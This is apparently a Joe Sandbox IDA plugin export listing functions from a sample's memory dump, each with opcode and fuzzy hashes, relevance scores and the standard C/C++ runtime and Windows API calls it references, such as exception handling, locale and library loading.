Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: aaa0b025c166fb1aa44586ccbeaac4ee909fd010a40fec40e2e23ea9da2b698a
Instruction ID: bd65e9ae12b4bce1c64b5f902c6f8f23f20ea2eb7e03d2c5b9d526eb467e3a7a
Opcode Fuzzy Hash: aaa0b025c166fb1aa44586ccbeaac4ee909fd010a40fec40e2e23ea9da2b698a
Instruction Fuzzy Hash: 23E04F31504558FBCF132F62EC09BAE7F59EF44764F068410FD0566161CB328E61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D6EFB Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006F07,009D6457), ref: 009D6F00

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fd4e9bead32d78344be42fa00d2c4c083364f879ec3bef4006c585fdeee9e5e0
Instruction ID: fbc3fbf7824e6eeb7405a26337175b15172d21cec8c30b60e7ff932181141636
Opcode Fuzzy Hash: fd4e9bead32d78344be42fa00d2c4c083364f879ec3bef4006c585fdeee9e5e0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 009ECD88 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 009ECD88

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 05e987cc3a2bd1b3b62e0e5f2fd8e6f5b2e7c5a80e383ab97bcf31af3554157b
Instruction ID: 3496ce61258321be5c55272799a0cc16c71fab85689fba62b36c6b05c1185f64
Opcode Fuzzy Hash: 05e987cc3a2bd1b3b62e0e5f2fd8e6f5b2e7c5a80e383ab97bcf31af3554157b
Instruction Fuzzy Hash: F8A0113032A2008B8B008F30AB0822A3AE8AA2A2823000028A808C00A0EB2080A0EB00

Uniqueness

Uniqueness Score: -1.00%

Function 009FFBC6 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15292fc7595616947a4a9ef4a86ddc63d7bd9bc59ebbc74b385f5f975eb12daa
Instruction ID: 0fb3062728a6659e5e497c6e7ec5111f906a6872d8c8aa93dbd249bd08b1c6a9
Opcode Fuzzy Hash: 15292fc7595616947a4a9ef4a86ddc63d7bd9bc59ebbc74b385f5f975eb12daa
Instruction Fuzzy Hash: 1D31C62518F3D70AC72B473888264AAFF719D13220BAE25DBC5E1CF8A3C2284859C757

Uniqueness

Uniqueness Score: -1.00%

Function 009EBC73 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: a66d4bec0c80256e051a67f081c70cb717a70ff59a53467d0dc11377abc24386
Instruction ID: ef12e8a210302e1237dd8bf1cf52ed9cccddaba82700023d50025ae52b595c7b
Opcode Fuzzy Hash: a66d4bec0c80256e051a67f081c70cb717a70ff59a53467d0dc11377abc24386
Instruction Fuzzy Hash: C7B11A755007829BDB35AB26CC92BB7B3ACEF44308F54496DEA83C6580EB75ED81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A00418 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cf99f039a1e854ba8d590396a2eec3821c6c0c10bc203e0cfc231443454280
Instruction ID: 99e2ef522daf836b1bce5c768014d3f4db73f188b3255d3357107ea11911004c
Opcode Fuzzy Hash: 75cf99f039a1e854ba8d590396a2eec3821c6c0c10bc203e0cfc231443454280
Instruction Fuzzy Hash: 97F0FEB1C007199FCB54DFADD5415AEFBF4FB08220B10866ED46AE3640E631AA408B51

Uniqueness

Uniqueness Score: -1.00%

Function 009D99E8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 009D9B07
___TypeMatch.LIBVCRUNTIME ref: 009D9C15
_UnwindNestedFrames.LIBCMT ref: 009D9D67
CallUnexpected.LIBVCRUNTIME ref: 009D9D82

Strings

csm, xrefs: 009D9A92
csm, xrefs: 009D9B3E
csm, xrefs: 009D9A25

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 3584f4b192e6b77ce2282a484be468deb2da1331ec8085757f3e206a546763db
Instruction ID: c9091ffedc7ebe322e84afacbbe1f6b1a3494854349d12e67652f27a8d822eec
Opcode Fuzzy Hash: 3584f4b192e6b77ce2282a484be468deb2da1331ec8085757f3e206a546763db
Instruction Fuzzy Hash: 5DB16771880209AFCF29FFA4D981AAEBBB9BF54310F54815BE8056B352D334DA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F0C2A Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00650520,00650520,?,7FFFFFFF,?,009F0EFA,00650520,00650520,?,00650520,?,?,?,?,00650520,?), ref: 009F0CD0
__alloca_probe_16.LIBCMT ref: 009F0D8B
__alloca_probe_16.LIBCMT ref: 009F0E1A
__freea.LIBCMT ref: 009F0E65
__freea.LIBCMT ref: 009F0E6B
__freea.LIBCMT ref: 009F0EA1
__freea.LIBCMT ref: 009F0EA7
__freea.LIBCMT ref: 009F0EB7

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 299aa05113b0231648832fb4efbbc99ecd40a946a621b7fa4e3d94ffb78c555b
Instruction ID: f41f39aa0bdaa69f79a7c2032eb1275ef6c099947168d84b96bc38dee2588c24
Opcode Fuzzy Hash: 299aa05113b0231648832fb4efbbc99ecd40a946a621b7fa4e3d94ffb78c555b
Instruction Fuzzy Hash: F271B57290034D9BDF219E94CC41BBF77BE9FC5354F280959EA58A7283DB759C408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009D9480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009D94B7
___except_validate_context_record.LIBVCRUNTIME ref: 009D94BF
_ValidateLocalCookies.LIBCMT ref: 009D9548
__IsNonwritableInCurrentImage.LIBCMT ref: 009D9573
_ValidateLocalCookies.LIBCMT ref: 009D95C8

Strings

csm, xrefs: 009D955D

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a17d7198fcfbae922cd9e997d867b57f0f457cd4959e311aff2f1f9e6105bdf8
Instruction ID: 90a1ee18ab1ab81f6fc62f468091970b139262accfa8e62f34a1fc92fc0d1957
Opcode Fuzzy Hash: a17d7198fcfbae922cd9e997d867b57f0f457cd4959e311aff2f1f9e6105bdf8
Instruction Fuzzy Hash: 1C41B234A40218EFCF11EF68D880BAEBBA5AF45324F18C166FD146B392D771DA11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009EF56E Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9098ca0244aabfda24a43cb78898e02073b408894ed107478d8b3df1ecf07a6
Instruction ID: 1881282e760fbd9176975cb8687da25d9e092651566066b5eac2456d18314f20
Opcode Fuzzy Hash: c9098ca0244aabfda24a43cb78898e02073b408894ed107478d8b3df1ecf07a6
Instruction Fuzzy Hash: 9AB10870A0428AAFDB12DF9AC860BBD7BF5BF89300F14816AE5159B392C7719D41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D4C6C Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009D4C73
std::_Lockit::_Lockit.LIBCPMT ref: 009D4C7D
int.LIBCPMT ref: 009D4C94

Part of subcall function 009D2577: std::_Lockit::_Lockit.LIBCPMT ref: 009D2588
Part of subcall function 009D2577: std::_Lockit::~_Lockit.LIBCPMT ref: 009D25A2

codecvt.LIBCPMT ref: 009D4CB7
std::_Facet_Register.LIBCPMT ref: 009D4CCE
std::_Lockit::~_Lockit.LIBCPMT ref: 009D4CEE

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: e9d19cb7debd9dcc14602000e57aebb1322b1ce9f88c532f1df291ed58d1b5db
Instruction ID: c4748920e3f30137a71c7cf2a049387b0ed31acb37e546ee413695cc176138ec
Opcode Fuzzy Hash: e9d19cb7debd9dcc14602000e57aebb1322b1ce9f88c532f1df291ed58d1b5db
Instruction Fuzzy Hash: 9A1103359506149BCB10EB68D8057BEB7F8BF84320F24841BF511A7391DFB4AA00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 009D967A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009D9671,009D9427,009D6F4B), ref: 009D9688
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009D9696
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009D96AF
SetLastError.KERNEL32(00000000,009D9671,009D9427,009D6F4B), ref: 009D9701

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6efb502d923efa6e7408c3229e685571b6478e5eb7a6d9ad429e5f902d887650
Instruction ID: 5c56d35f090cb7374150e06983a610c798eb59a55dca3fe1ace5e3d909e9f6b2
Opcode Fuzzy Hash: 6efb502d923efa6e7408c3229e685571b6478e5eb7a6d9ad429e5f902d887650
Instruction Fuzzy Hash: 2401D4321AD7119EA7143B747C857672B5AFB42374334822BF920853F0EF918C11F246

Uniqueness

Uniqueness Score: -1.00%

Function 009D1DFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009D1E09
int.LIBCPMT ref: 009D1E1C

Part of subcall function 009D2577: std::_Lockit::_Lockit.LIBCPMT ref: 009D2588
Part of subcall function 009D2577: std::_Lockit::~_Lockit.LIBCPMT ref: 009D25A2

std::_Facet_Register.LIBCPMT ref: 009D1E4F
std::_Lockit::~_Lockit.LIBCPMT ref: 009D1E65

Strings

XKe, xrefs: 009D1E0E, 009D1E5C

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: XKe
API String ID: 459529453-3015419139
Opcode ID: 8d4dc68cbdd56938a148dee71fe22eb9ca582d034b2d0aa87a6621bba65f96c0
Instruction ID: f0efbcfc22d27402e11d0d9719bc9dd3b527b4527b8eb2512e99f6f987e631b1
Opcode Fuzzy Hash: 8d4dc68cbdd56938a148dee71fe22eb9ca582d034b2d0aa87a6621bba65f96c0
Instruction Fuzzy Hash: 5301D633980118BBCB15AB94D906DAE7778EFC07A0B60855AF911AB3E0EF70DE01C790

Uniqueness

Uniqueness Score: -1.00%

Function 009D1E76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009D1E82
int.LIBCPMT ref: 009D1E95

Part of subcall function 009D2577: std::_Lockit::_Lockit.LIBCPMT ref: 009D2588
Part of subcall function 009D2577: std::_Lockit::~_Lockit.LIBCPMT ref: 009D25A2

std::_Facet_Register.LIBCPMT ref: 009D1EC8
std::_Lockit::~_Lockit.LIBCPMT ref: 009D1EDE

Strings

@=e, xrefs: 009D1E87, 009D1ED5

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: @=e
API String ID: 459529453-3639314875
Opcode ID: 251b1d24a676fd596d8ddc3c82a2033657d7d341e9739b9c1f0a8b09f64ad447
Instruction ID: dd53551af69d3126e274b00ed093392ef989d5b164548e2964e5b2d4ad0d26db
Opcode Fuzzy Hash: 251b1d24a676fd596d8ddc3c82a2033657d7d341e9739b9c1f0a8b09f64ad447
Instruction Fuzzy Hash: 8301DB32944118BBCB15EB94E9069AD77BCDFD4760B108157F911AB3A0EB30DF01C791

Uniqueness

Uniqueness Score: -1.00%

Function 009E0EA9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CEFD0730,?,?,00000000,009F2854,000000FF,?,009E0E39,?,?,009E0E0D,00000000), ref: 009E0EDE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009E0EF0
FreeLibrary.KERNEL32(00000000,?,00000000,009F2854,000000FF,?,009E0E39,?,?,009E0E0D,00000000), ref: 009E0F12

Strings

CorExitProcess, xrefs: 009E0EE8
mscoree.dll, xrefs: 009E0ED7

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 06ae274cab3a2d2bdefbcdaa0c6fda56dec3787511adf94768d4de2149f9fdfe
Instruction ID: c916a26ff627ce791aa72f7b9fb6c8f531cd6ca3bce4fbf0184f5331b6c4131d
Opcode Fuzzy Hash: 06ae274cab3a2d2bdefbcdaa0c6fda56dec3787511adf94768d4de2149f9fdfe
Instruction Fuzzy Hash: 7401A23191C659EFDB128F94CC05BBEBBB8FB44B14F040529F921A2290EBB49840CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D462E Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009D4635
std::_Lockit::_Lockit.LIBCPMT ref: 009D4640
std::_Lockit::~_Lockit.LIBCPMT ref: 009D46AE

Part of subcall function 009D4791: std::locale::_Locimp::_Locimp.LIBCPMT ref: 009D47A9

std::locale::_Setgloballocale.LIBCPMT ref: 009D465B
_Yarn.LIBCPMT ref: 009D4671

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: dbcff60b839601b1e8c4020a1846acd29e62147bbe4a9bde8df510bc198a2e67
Instruction ID: 4c44da8b5ccc3cd0a2fd29f5b870cb07cb9fe28b24da3a7e6bb37808b90dac4d
Opcode Fuzzy Hash: dbcff60b839601b1e8c4020a1846acd29e62147bbe4a9bde8df510bc198a2e67
Instruction Fuzzy Hash: DB012635A546109BCB05EF20D89163C7BB5FFD5310B18800AE912A7381DF34AE42DFC1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AC49 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A1AC55

Part of subcall function 00A1AE2C: __getptd_noexit.LIBCMT ref: 00A1AE2F
Part of subcall function 00A1AE2C: __amsg_exit.LIBCMT ref: 00A1AE3C

__getptd.LIBCMT ref: 00A1AC6C
__amsg_exit.LIBCMT ref: 00A1AC7A
__lock.LIBCMT ref: 00A1AC8A
__updatetlocinfoEx_nolock.LIBCMT ref: 00A1AC9E

Memory Dump Source

Source File: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction ID: 979426c1d85f7e2b9652e4650a22444ea98ef97d2f91348400c0e558ad2901be
Opcode Fuzzy Hash: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
Instruction Fuzzy Hash: BDF054329077209BD761BBF8AA03BDF37A0AF50760F144259F4416B5D2CB3459C1DA9B

Uniqueness

Uniqueness Score: -1.00%

Function 009DA7C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,009DA773,00000000,?,?,?,?,?,009DA89D,00000002,FlsGetValue,009F5D40,FlsGetValue), ref: 009DA7CF
GetLastError.KERNEL32(?,009DA773,00000000,?,?,?,?,?,009DA89D,00000002,FlsGetValue,009F5D40,FlsGetValue,00000000,?,009D972D), ref: 009DA7D9
LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,009D972D,?,?,?,?,?,?), ref: 009DA801

Strings

api-ms-, xrefs: 009DA7E6

Memory Dump Source

Source File: 00000000.00000002.1611307170.00000000009D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1611245053.00000000009D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611343086.00000000009F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611417209.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1611441231.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 8e9e55974ba0b474bae9bb0052f0ec2ad6669421670d9ce1f1421b33c7220e68
Instruction ID: 8d6d34932935d95abd5d8c9b9bd1f9ab9a0f6c5951c032cc6ff85ecdb8dd0ff6
